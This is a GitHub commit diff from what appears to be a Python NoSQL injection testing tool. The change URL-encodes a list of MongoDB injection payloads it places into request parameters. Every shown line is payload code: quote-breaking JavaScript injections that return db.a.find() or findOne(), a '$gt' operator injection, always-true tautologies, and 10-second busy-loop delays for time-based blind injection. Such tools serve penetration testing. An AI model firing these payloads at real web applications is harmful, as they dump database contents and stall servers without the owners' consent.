You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
uriArray[2] +=paramName[x] +"=a'; return db.a.find(); var dummy='!"+"&"
919
-
uriArray[3] +=paramName[x] +"=1; return db.a.find(); var dummy=1"+"&"
920
-
uriArray[4] +=paramName[x] +"=a'; return db.a.findOne(); var dummy='!"+"&"
921
-
uriArray[5] +=paramName[x] +"=1; return db.a.findOne(); var dummy=1"+"&"
922
-
uriArray[6] +=paramName[x] +"=a'; return this.a != '"+randValue+"'; var dummy='!"+"&"
923
-
uriArray[7] +=paramName[x] +"=1; return this.a !="+randValue+"; var dummy=1"+"&"
918
+
uriArray[2] +=paramName[x] +"="+urllib.quote("a'; return db.a.find(); var dummy='!")+"&"
919
+
uriArray[3] +=paramName[x] +"="+urllib.quote("1; return db.a.find(); var dummy=1")+"&"
920
+
uriArray[4] +=paramName[x] +"="+urllib.quote("a'; return db.a.findOne(); var dummy='!")+"&"
921
+
uriArray[5] +=paramName[x] +"="+urllib.quote("1; return db.a.findOne(); var dummy=1")+"&"
922
+
uriArray[6] +=paramName[x] +"="+urllib.quote("a'; return this.a != '"+randValue+"'; var dummy='!")+"&"
923
+
uriArray[7] +=paramName[x] +"="+urllib.quote("1; return this.a !="+randValue+"; var dummy=1")+"&"
924
924
uriArray[8] +=paramName[x] +"[$gt]=&"
925
-
uriArray[9] +=paramName[x] +"=1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1"+"&"
926
-
uriArray[10] +=paramName[x] +"=a\"; return db.a.find(); var dummy='!"+"&"
927
-
uriArray[11] +=paramName[x] +"=a\"; return this.a != '"+randValue+"'; var dummy='!"+"&"
928
-
uriArray[12] +=paramName[x] +"=a\"; return db.a.findOne(); var dummy=\"!"+"&"
929
-
uriArray[13] +=paramName[x] +"=a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!"+"&"
930
-
uriArray[14] +=paramName[x] +"a'; return true; var dum='a"
925
+
uriArray[9] +=paramName[x] +"="+urllib.quote("1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1")+"&"
926
+
uriArray[10] +=paramName[x] +"="+urllib.quote("a\"; return db.a.find(); var dummy='!")+"&"
927
+
uriArray[11] +=paramName[x] +"="+urllib.quote("a\"; return this.a != '"+randValue+"'; var dummy='!")+"&"
928
+
uriArray[12] +=paramName[x] +"="+urllib.quote("a\"; return db.a.findOne(); var dummy=\"!")+"&"
929
+
uriArray[13] +=paramName[x] +"="+urllib.quote("a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!")+"&"
930
+
uriArray[14] +=paramName[x] +urllib.quote("a'; return true; var dum='a")
931
931
uriArray[15] +=paramName[x] +"1; return true; var dum=2"
932
932
#Add values that can be manipulated for database attacks
uriArray[18] +=paramName[x] +"=a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!"+"&"
935
+
uriArray[18] +=paramName[x] +"="+urllib.quote("a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!")+"&"
0 commit comments